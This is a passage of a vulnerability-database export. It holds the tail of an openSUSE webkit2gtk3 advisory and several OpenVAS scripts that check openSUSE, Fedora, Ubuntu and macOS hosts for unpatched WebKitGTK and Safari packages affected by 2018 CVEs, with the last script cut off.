ENABLE_ADDRESS_SANITIZER to make it easier to build with asan\n support.\n - Fix a crash a under Wayland when using mesa software rasterization.\n - Make fullscreen video work again.\n - Fix handling of missing GStreamer elements.\n - Fix rendering when webm video is played twice.\n - Fix kinetic scrolling sometimes jumping around.\n - Fix build with ICU configured without collation support.\n - WebSockets use system proxy settings now (requires libsoup 2.61.90).\n - Show the context menu on long-press gesture.\n - Add support for Shift + mouse scroll to scroll horizontally.\n - Fix zoom gesture to actually zoom instead of changing the page scale.\n - Implement support for Graphics ARIA roles.\n - Make sleep inhibitors work under Flatpak.\n - Add get element CSS value command to WebDriver.\n - Fix a crash aftter a swipe gesture.\n - Fix several crashes and rendering issues.\n - Fix crashes due to duplicated symbols in libjavascriptcoregtk and\n libwebkit2gtk.\n - Fix parsing of timeout values in WebDriver.\n - Implement get timeouts command in WebDriver.\n - Fix deadlock in GStreamer video sink during shutdown when accelerated\n compositing is disabled.\n - Fix several crashes and rendering issues.\n - Add web process API to detect when form is submitted via JavaScript.\n - Add new API to replace webkit_form_submission_request_get_text_fields()\n that is now deprecated.\n - Add WebKitWebView::web-process-terminated signal and deprecate\n web-process-crashed.\n - Fix rendering issues when editing text areas.\n - Use FastMalloc based GstAllocator for GStreamer.\n - Fix web process crash at startup in bmalloc.\n - Fix several memory leaks in GStreamer media backend.\n - WebKitWebDriver process no longer links to libjavascriptcoregtk.\n - Fix several crashes and rendering issues.\n - Add new API to add, retrieve and delete cookies via WebKitCookieManager.\n - Add functions to WebSettings to convert font sizes between points and\n pixels.\n - Ensure cookie operations take effect when they happen before a web\n process has been spawned.\n - Automatically adjust font size when GtkSettings:gtk-xft-dpi changes.\n - Add initial resource load statistics support.\n - Add API to expose availability of certain editing commands in\n WebKitEditorState.\n - Add API to query whether a WebKitNavigationAction is a redirect\n or not.\n - Improve complex text rendering.\n - Add support for the &quot;system&quot; CSS font family.\n - Disable USE_GSTREAMER_GL\n\n This update was imported from the SUSE:SLE-12-SP2:Update update project.\n\n", "edition": 1, "modified": "2018-10-26T00:11:58", "published": "2018-10-26T00:11:58", "id": "OPENSUSE-SU-2018:3473-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2018-10/msg00071.html", "title": "Security update for webkit2gtk3 (moderate)", "type": "suse", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "openvas": [{"lastseen": "2020-01-31T17:39:58", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-4199", "CVE-2018-4190", "CVE-2018-11646", "CVE-2018-4233", "CVE-2018-4222", "CVE-2018-4218", "CVE-2018-4232"], "description": "The remote host is missing an update for the ", "modified": "2020-01-31T00:00:00", "published": "2018-10-26T00:00:00", "id": "OPENVAS:1361412562310851975", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851975", "type": "openvas", "title": "openSUSE: Security Advisory for webkit2gtk3 (openSUSE-SU-2018:2285-1)", "sourceData": "# Copyright (C) 2018 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851975\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_cve_id(\"CVE-2018-11646\", \"CVE-2018-4190\", \"CVE-2018-4199\", \"CVE-2018-4218\", \"CVE-2018-4222\", \"CVE-2018-4232\", \"CVE-2018-4233\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-10-26 06:24:51 +0200 (Fri, 26 Oct 2018)\");\n script_name(\"openSUSE: Security Advisory for webkit2gtk3 (openSUSE-SU-2018:2285-1)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSELeap15\\.0\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2018:2285-1\");\n script_xref(name:\"URL\", value:\"https://lists.opensuse.org/opensuse-security-announce/2018-08/msg00031.html\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'webkit2gtk3'\n package(s) announced via the openSUSE-SU-2018:2285-1 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This update for webkit2gtk3 to version 2.20.3 fixes the following issues:\n\n These security issues were fixed:\n\n - CVE-2018-4190: An unspecified issue allowed remote attackers to obtain\n sensitive credential information that is transmitted during a CSS\n mask-image fetch (bsc#1097693).\n\n - CVE-2018-4199: An unspecified issue allowed remote attackers to execute\n arbitrary code or cause a denial of service (buffer overflow and\n application crash) via a crafted web site (bsc#1097693)\n\n - CVE-2018-4218: An unspecified issue allowed remote attackers to execute\n arbitrary code or cause a denial of service (memory corruption and\n application crash) via a crafted web site that triggers an\n @generatorState use-after-free (bsc#1097693)\n\n - CVE-2018-4222: An unspecified issue allowed remote attackers to execute\n arbitrary code via a crafted web site that leverages a\n getWasmBufferFromValue\n out-of-bounds read during WebAssembly compilation (bsc#1097693)\n\n - CVE-2018-4232: An unspecified issue allowed remote attackers to\n overwrite cookies via a crafted web site (bsc#1097693)\n\n - CVE-2018-4233: An unspecified issue allowed remote attackers to execute\n arbitrary code or cause a denial of service (memory corruption and\n application crash) via a crafted web site (bsc#1097693)\n\n - CVE-2018-11646: webkitFaviconDatabaseSetIconForPageURL and\n webkitFaviconDatabaseSetIconURLForPageURL mishandle an unset pageURL,\n leading to an application crash (bsc#1095611).\n\n These non-security issues were fixed:\n\n - Disable Gigacage if mmap fails to allocate in Linux.\n\n - Add user agent quirk for paypal website.\n\n - Fix a network process crash when trying to get cookies of about:blank\n page.\n\n - Fix UI process crash when closing the window under Wayland.\n\n - Fix several crashes and rendering issues.\n\n This update was imported from the SUSE:SLE-15:Update update project.\n\n Patch Instructions:\n\n To install this openSUSE Security Update use the SUSE recommended\n installation methods\n like YaST online_update or 'zypper patch'.\n\n Alternatively you can run the command listed for your product:\n\n - openSUSE Leap 15.0:\n\n zypper in -t patch openSUSE-2018-845=1\");\n\n script_tag(name:\"affected\", value:\"webkit2gtk3 on openSUSE Leap 15.0.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSELeap15.0\") {\n if(!isnull(res = isrpmvuln(pkg:\"libjavascriptcoregtk-4_0-18\", rpm:\"libjavascriptcoregtk-4_0-18~2.20.3~lp150.2.3.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libjavascriptcoregtk-4_0-18-debuginfo\", rpm:\"libjavascriptcoregtk-4_0-18-debuginfo~2.20.3~lp150.2.3.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libwebkit2gtk-4_0-37\", rpm:\"libwebkit2gtk-4_0-37~2.20.3~lp150.2.3.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libwebkit2gtk-4_0-37-debuginfo\", rpm:\"libwebkit2gtk-4_0-37-debuginfo~2.20.3~lp150.2.3.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"typelib-1_0-JavaScriptCore-4_0\", rpm:\"typelib-1_0-JavaScriptCore-4_0~2.20.3~lp150.2.3.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"typelib-1_0-WebKit2-4_0\", rpm:\"typelib-1_0-WebKit2-4_0~2.20.3~lp150.2.3.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"typelib-1_0-WebKit2WebExtension-4_0\", rpm:\"typelib-1_0-WebKit2WebExtension-4_0~2.20.3~lp150.2.3.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit-jsc-4\", rpm:\"webkit-jsc-4~2.20.3~lp150.2.3.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit-jsc-4-debuginfo\", rpm:\"webkit-jsc-4-debuginfo~2.20.3~lp150.2.3.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit2gtk-4_0-injected-bundles\", rpm:\"webkit2gtk-4_0-injected-bundles~2.20.3~lp150.2.3.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit2gtk-4_0-injected-bundles-debuginfo\", rpm:\"webkit2gtk-4_0-injected-bundles-debuginfo~2.20.3~lp150.2.3.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit2gtk3-debugsource\", rpm:\"webkit2gtk3-debugsource~2.20.3~lp150.2.3.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit2gtk3-devel\", rpm:\"webkit2gtk3-devel~2.20.3~lp150.2.3.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit2gtk3-plugin-process-gtk2\", rpm:\"webkit2gtk3-plugin-process-gtk2~2.20.3~lp150.2.3.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit2gtk3-plugin-process-gtk2-debuginfo\", rpm:\"webkit2gtk3-plugin-process-gtk2-debuginfo~2.20.3~lp150.2.3.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libjavascriptcoregtk-4_0-18-32bit\", rpm:\"libjavascriptcoregtk-4_0-18-32bit~2.20.3~lp150.2.3.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libjavascriptcoregtk-4_0-18-32bit-debuginfo\", rpm:\"libjavascriptcoregtk-4_0-18-32bit-debuginfo~2.20.3~lp150.2.3.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libwebkit2gtk-4_0-37-32bit\", rpm:\"libwebkit2gtk-4_0-37-32bit~2.20.3~lp150.2.3.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libwebkit2gtk-4_0-37-32bit-debuginfo\", rpm:\"libwebkit2gtk-4_0-37-32bit-debuginfo~2.20.3~lp150.2.3.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libwebkit2gtk3-lang\", rpm:\"libwebkit2gtk3-lang~2.20.3~lp150.2.3.1\", rls:\"openSUSELeap15.0\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:32:55", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-4199", "CVE-2018-4190", "CVE-2018-11646", "CVE-2018-4233", "CVE-2018-4222", "CVE-2018-4218", "CVE-2018-4246", "CVE-2018-4232"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2018-06-17T00:00:00", "id": "OPENVAS:1361412562310874687", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310874687", "type": "openvas", "title": "Fedora Update for webkit2gtk3 FEDORA-2018-118b9abf99", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2018_118b9abf99_webkit2gtk3_fc28.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for webkit2gtk3 FEDORA-2018-118b9abf99\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.874687\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-06-17 06:06:02 +0200 (Sun, 17 Jun 2018)\");\n script_cve_id(\"CVE-2018-4190\", \"CVE-2018-4199\", \"CVE-2018-4218\", \"CVE-2018-4222\",\n \"CVE-2018-4232\", \"CVE-2018-4233\", \"CVE-2018-4246\", \"CVE-2018-11646\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for webkit2gtk3 FEDORA-2018-118b9abf99\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'webkit2gtk3'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\non the target host.\");\n script_tag(name:\"affected\", value:\"webkit2gtk3 on Fedora 28\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_xref(name:\"FEDORA\", value:\"2018-118b9abf99\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/GY5NYBUZRNA46WQEP2XZCOJFY4BVEJ3X\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC28\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC28\")\n{\n\n if ((res = isrpmvuln(pkg:\"webkit2gtk3\", rpm:\"webkit2gtk3~2.20.3~1.fc28\", rls:\"FC28\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:33:11", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-4199", "CVE-2018-4190", "CVE-2018-11646", "CVE-2018-4233", "CVE-2018-4222", "CVE-2018-4218", "CVE-2018-4246", "CVE-2018-4232"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2018-06-29T00:00:00", "id": "OPENVAS:1361412562310874747", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310874747", "type": "openvas", "title": "Fedora Update for webkitgtk4 FEDORA-2018-aac3ca8936", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2018_aac3ca8936_webkitgtk4_fc27.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for webkitgtk4 FEDORA-2018-aac3ca8936\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.874747\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-06-29 10:56:18 +0200 (Fri, 29 Jun 2018)\");\n script_cve_id(\"CVE-2018-4190\", \"CVE-2018-4199\", \"CVE-2018-4218\", \"CVE-2018-4222\",\n \"CVE-2018-4232\", \"CVE-2018-4233\", \"CVE-2018-4246\", \"CVE-2018-11646\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for webkitgtk4 FEDORA-2018-aac3ca8936\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'webkitgtk4'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\non the target host.\");\n script_tag(name:\"affected\", value:\"webkitgtk4 on Fedora 27\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_xref(name:\"FEDORA\", value:\"2018-aac3ca8936\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/Q6P4J4BQM66DFTDUIWVOVRVIB2AYST56\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC27\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC27\")\n{\n\n if ((res = isrpmvuln(pkg:\"webkitgtk4\", rpm:\"webkitgtk4~2.20.3~1.fc27\", rls:\"FC27\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:33:23", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-4199", "CVE-2018-4190", "CVE-2018-12293", "CVE-2018-4233", "CVE-2018-4222", "CVE-2018-4218", "CVE-2018-4232"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2018-06-19T00:00:00", "id": "OPENVAS:1361412562310843564", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843564", "type": "openvas", "title": "Ubuntu Update for webkit2gtk USN-3687-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_3687_1.nasl 14140 2019-03-13 12:26:09Z cfischer $\n#\n# Ubuntu Update for webkit2gtk USN-3687-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843564\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-06-19 06:01:01 +0200 (Tue, 19 Jun 2018)\");\n script_cve_id(\"CVE-2018-12293\", \"CVE-2018-4190\", \"CVE-2018-4199\", \"CVE-2018-4218\", \"CVE-2018-4222\", \"CVE-2018-4232\", \"CVE-2018-4233\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for webkit2gtk USN-3687-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'webkit2gtk'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"A large number of security issues were discovered in the WebKitGTK+ Web and\nJavaScript engines. If a user were tricked into viewing a malicious\nwebsite, a remote attacker could exploit a variety of issues related to web\nbrowser security, including cross-site scripting attacks, denial of service\nattacks, and arbitrary code execution.\");\n script_tag(name:\"affected\", value:\"webkit2gtk on Ubuntu 18.04 LTS,\n Ubuntu 17.10,\n Ubuntu 16.04 LTS\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_xref(name:\"USN\", value:\"3687-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3687-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(17\\.10|18\\.04 LTS|16\\.04 LTS)\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU17.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libjavascriptcoregtk-4.0-18\", ver:\"2.20.3-0ubuntu0.17.10.1\", rls:\"UBUNTU17.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libwebkit2gtk-4.0-37\", ver:\"2.20.3-0ubuntu0.17.10.1\", rls:\"UBUNTU17.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU18.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libjavascriptcoregtk-4.0-18\", ver:\"2.20.3-0ubuntu0.18.04.1\", rls:\"UBUNTU18.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libwebkit2gtk-4.0-37\", ver:\"2.20.3-0ubuntu0.18.04.1\", rls:\"UBUNTU18.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU16.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libjavascriptcoregtk-4.0-18\", ver:\"2.20.3-0ubuntu0.16.04.1\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libwebkit2gtk-4.0-37\", ver:\"2.20.3-0ubuntu0.16.04.1\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-03-03T19:44:58", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-4188", "CVE-2018-4205", "CVE-2018-4199", "CVE-2018-4190", "CVE-2018-4233", "CVE-2018-4222", "CVE-2018-4192", "CVE-2018-4201", "CVE-2018-4218", "CVE-2018-4246", "CVE-2018-4214", "CVE-2018-4247", "CVE-2018-4232"], "description": "This host is installed with Apple Safari\n and is prone to multiple vulnerabilities.", "modified": "2020-02-28T00:00:00", "published": "2018-06-04T00:00:00", "id": "OPENVAS:1361412562310813509", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813509", "type": "openvas", "title": "Apple Safari Security Updates(HT208854)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Apple Safari Security Updates(HT208854)\n#\n# Authors:\n# Rajat Mishra <rajatm@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apple:safari\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813509\");\n script_version(\"2020-02-28T13:41:47+0000\");\n script_cve_id(\"CVE-2018-4247\", \"CVE-2018-4205\", \"CVE-2018-4232\", \"CVE-2018-4246\",\n \"CVE-2018-4192\", \"CVE-2018-4188\", \"CVE-2018-4214\", \"CVE-2018-4201\",\n \"CVE-2018-4218\", \"CVE-2018-4233\", \"CVE-2018-4199\", \"CVE-2018-4190\",\n \"CVE-2018-4222\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-02-28 13:41:47 +0000 (Fri, 28 Feb 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-06-04 13:35:10 +0530 (Mon, 04 Jun 2018)\");\n script_name(\"Apple Safari Security Updates(HT208854)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Apple Safari\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - A permissions issue in the handling of web browser cookies.\n\n - A type confusion issue in memory handling.\n\n - A race condition issue in locking.\n\n - A memory corruption issue in input validation.\n\n - A buffer overflow issue in memory handling.\n\n - Credentials were unexpectedly sent when fetching CSS mask images.\n\n - An out-of-bounds read issue in input validation.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation of will allow remote\n attackers to cause a denial of service, conduct spoofing attack, overwrite\n cookies, execute arbitrary code, crash Safari and leak sensitive data.\");\n\n script_tag(name:\"affected\", value:\"Apple Safari versions before 11.1.1.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Apple Safari 11.1.1 or later. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.apple.com/en-us/HT208854\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"macosx_safari_detect.nasl\");\n script_mandatory_keys(\"AppleSafari/MacOSX/Version\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif(!infos = get_app_version_and_location(cpe:CPE, exit_no_version:TRUE))\n 